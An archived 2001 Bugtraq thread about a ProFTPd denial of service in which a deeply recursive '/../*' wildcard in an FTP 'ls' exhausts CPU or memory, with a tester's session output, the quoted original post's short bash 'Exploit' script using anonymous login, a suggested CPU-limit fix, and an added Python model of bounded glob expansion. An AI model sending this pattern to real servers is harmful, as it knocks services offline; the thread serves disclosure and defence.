[22355] in bugtraq


Re: Multiple-Vendor-FTP-Vuln. (old?)

daemon@ATHENA.MIT.EDU (Dmitriy Kropivnitskiy)
Tue Aug 21 12:59:49 2001

Date: Tue, 21 Aug 2001 10:46:39 -0400
From: Dmitriy Kropivnitskiy <dkropivnitskiy@tigertesting.com>
To: bugtraq@securityfocus.com
Message-ID: <20010821104639.A1596@zaphod>
Reply-To: Dmitriy Kropivnitskiy <dkropivnitskiy@tigertesting.com>
Mail-Followup-To: Dmitriy Kropivnitskiy <dkropivnitskiy@tigertesting.com>,
	bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200108201320.f7KDKZK26818@mailgate4.cinetic.de>; from IphantomI@web.de on Mon, Aug 20, 2001 at 03:20:35PM +0200

Tested on Mandrake 8.0. ProFTPd version is proftpd-1.2.2-0.rc1.3mdk.
Here are the results:

Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of
/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Transfer complete.
226 Quotas off
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
226-Out of memory during globbing of
/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
Transfer complete.
226 Quotas off
ftp> quit
221 Goodbye.
[root@system user]# ps aux | grep ftp
nobody    3773  0.0  0.4  2152 1052 ?        S    10:44   0:00 proftpd (acceptin


On Mon, Aug 20, 2001 at 03:20:35PM +0200, Enrico Kern wrote:
> Hi,
> 
> I tested an old proftpd bug (ls /../*/../*/../*/../*/../*/../*/../*) on
> many new Linux distributions. When a user is logged in to ftp and types
> the ls command, in.ftpd takes over 90 percent CPU usage; execute
> the command 2 or 3x and then the full system hangs. It also works in the
> console. I wonder that it is not fixed. THIS BUG IS OLD. POSTED ON BUGTRAQ
> in March 01, but it still works, so I am posting it again.
> 
> affected:
> 
> RedHat Linux 7.x
> Linux Mandrake 8.0
> SuSE Linux 7.2
> FreeBSD 4.3
> AiX V 4.3
> other?
> 
> 
> Not vuln.:
> 
> latest Wu-Ftpd
> Windows FTP-Server
> 
> 
> Exploit:
> 
> #!/bin/bash
> ftp -n FTP-SERVER<<\end
> quot user anonymous
> bin
> quot pass shitold@bug.com
> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
> bye
> end
> 
> Fix:
> 
> set cpu-limit for your anonymous user.
> 
> 
> -------------------------
> Enrico Kern
> www.h07.org
> 
> 
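
Added example (not part of either message above, and not ProFTPD code): a simplified Python model of component-wise glob expansion. It shows why every "*/.." pair in the pattern multiplies the candidate set by the number of directories in the FTP root, and how a path budget turns that growth into a bounded failure instead of CPU or memory exhaustion. The names bounded_glob, GlobLimitExceeded and make_demo_root, the max_paths default and the directory tree are assumptions constructed for illustration.

```python
import fnmatch
import os
import tempfile

class GlobLimitExceeded(Exception):
    """The pattern expanded past the configured path budget."""

def bounded_glob(root, pattern, max_paths=1000):
    """Expand pattern component by component beneath root, keeping duplicate
    paths; abort once the candidate set exceeds max_paths."""
    root = os.path.realpath(root)
    paths = [root]
    for comp in pattern.split("/"):
        if comp in ("", "."):
            continue
        expanded = []
        for p in paths:
            if not os.path.isdir(p):
                continue  # cannot descend through a non-directory
            if comp == "..":
                # Assumption: clamp at the FTP root, as a chroot would.
                found = [p if p == root else os.path.dirname(p)]
            elif any(ch in comp for ch in "*?["):
                found = [os.path.join(p, n) for n in sorted(os.listdir(p))
                         if not n.startswith(".") and fnmatch.fnmatchcase(n, comp)]
            else:
                q = os.path.join(p, comp)
                found = [q] if os.path.lexists(q) else []
            expanded.extend(found)
            if len(expanded) > max_paths:
                raise GlobLimitExceeded(
                    f"over {max_paths} candidate paths at component {comp!r}")
        paths = expanded
    return paths

def make_demo_root(n_dirs):
    """Constructed sample tree: a root holding n_dirs empty subdirectories."""
    root = tempfile.mkdtemp(prefix="ftproot-")
    for i in range(n_dirs):
        os.mkdir(os.path.join(root, f"dir{i}"))
    return root

if __name__ == "__main__":
    root = make_demo_root(5)
    print(len(bounded_glob(root, "/../*/../*")))  # 5 * 5 candidate paths
    try:  # the LIST argument from the session above
        bounded_glob(root, "/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*")
    except GlobLimitExceeded as exc:
        print("rejected:", exc)
```

With only five directories in the root the budget of 1000 paths is already exceeded at the fifth wildcard, so the expansion stops long before the full pattern is processed.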
